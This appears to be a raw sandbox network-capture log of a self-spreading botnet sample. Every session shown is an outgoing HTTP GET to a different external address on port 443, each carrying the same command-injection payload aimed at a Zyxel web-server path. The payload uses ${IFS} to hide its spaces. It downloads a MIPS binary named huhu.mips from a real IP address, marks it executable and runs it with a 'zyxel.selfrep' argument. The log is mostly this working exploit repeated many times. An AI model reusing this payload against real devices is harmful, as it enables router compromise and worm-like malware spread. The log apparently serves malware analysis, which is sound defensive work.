                                            Feb 2, 2024 06:21:20.787014008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6228192.168.2.1558652141.95.191.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787041903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6229192.168.2.154016664.241.149.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787084103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6230192.168.2.15328322.85.12.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787102938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6231192.168.2.154939824.151.61.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787163973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6232192.168.2.153563488.227.11.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787194967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6233192.168.2.1553366117.117.254.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787223101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6234192.168.2.1541890208.214.86.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787250996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6235192.168.2.154291213.198.53.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787302017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6236192.168.2.155987638.54.192.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787347078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6237192.168.2.1551188130.234.246.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787380934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6238192.168.2.1534650134.181.14.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787434101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6239192.168.2.1547998197.215.231.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787460089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6240192.168.2.1557058209.230.174.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787496090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6241192.168.2.1557034190.21.202.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787540913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6242192.168.2.1555628180.128.254.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787570000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6243192.168.2.1555484177.54.232.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787709951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6244192.168.2.1559836134.192.17.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787739992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6245192.168.2.1545170103.246.50.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787781000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6246192.168.2.153912035.182.169.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787817955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6247192.168.2.155875444.89.226.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787854910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6248192.168.2.1555854211.97.204.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787908077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6249192.168.2.1544248162.132.22.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787940025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6250192.168.2.1540066110.5.229.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.787981033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6251192.168.2.15423182.62.227.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788002014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6252192.168.2.1540432109.253.168.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788058996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6253192.168.2.1554610134.198.0.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788074017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6254192.168.2.1559314191.145.2.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788114071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6255192.168.2.153570612.76.207.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788172960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6256192.168.2.1543762212.162.160.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788204908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6257192.168.2.1537268154.235.86.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788254976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6258192.168.2.155833423.19.8.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788295031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6259192.168.2.155187466.29.120.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788335085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6260192.168.2.1550844165.51.185.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788372040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6261192.168.2.1539144106.46.230.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788394928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6262192.168.2.1545618206.209.186.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788450956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6263192.168.2.1548528164.138.254.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788480997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6264192.168.2.1559576199.183.198.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788526058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6265192.168.2.153388814.131.16.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788585901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6266192.168.2.1537098209.115.103.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788619995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6267192.168.2.1544562107.179.68.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788639069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6268192.168.2.1557578188.91.141.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788664103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6269192.168.2.1541004216.171.13.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788717031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6270192.168.2.1557842184.21.28.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788749933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6271192.168.2.1550420195.70.55.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788779020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6272192.168.2.1537498104.29.149.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788810968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6273192.168.2.155861683.67.234.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788872004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6274192.168.2.1537396181.152.104.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788906097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6275192.168.2.153851027.114.164.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788928986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6276192.168.2.155072875.60.36.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.788990021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6277192.168.2.155154473.12.148.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789011002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6278192.168.2.156080032.164.214.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789053917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6279192.168.2.154024646.77.250.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789076090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6280192.168.2.1547224100.137.200.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789113045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6281192.168.2.155097244.6.194.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789170980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6282192.168.2.1542950175.3.8.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789210081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6283192.168.2.155609472.250.20.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789256096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6284192.168.2.1540620204.175.175.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789293051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6285192.168.2.1551722171.65.93.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789335012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6286192.168.2.155253460.79.74.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789359093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6287192.168.2.1537956115.242.129.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789424896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6288192.168.2.1534916108.171.153.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789448023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6289192.168.2.154404878.175.43.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789477110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6290192.168.2.154328081.175.51.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.789516926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6291192.168.2.155510420.152.221.72443
                                            TimestampBytes transferredDirectionData
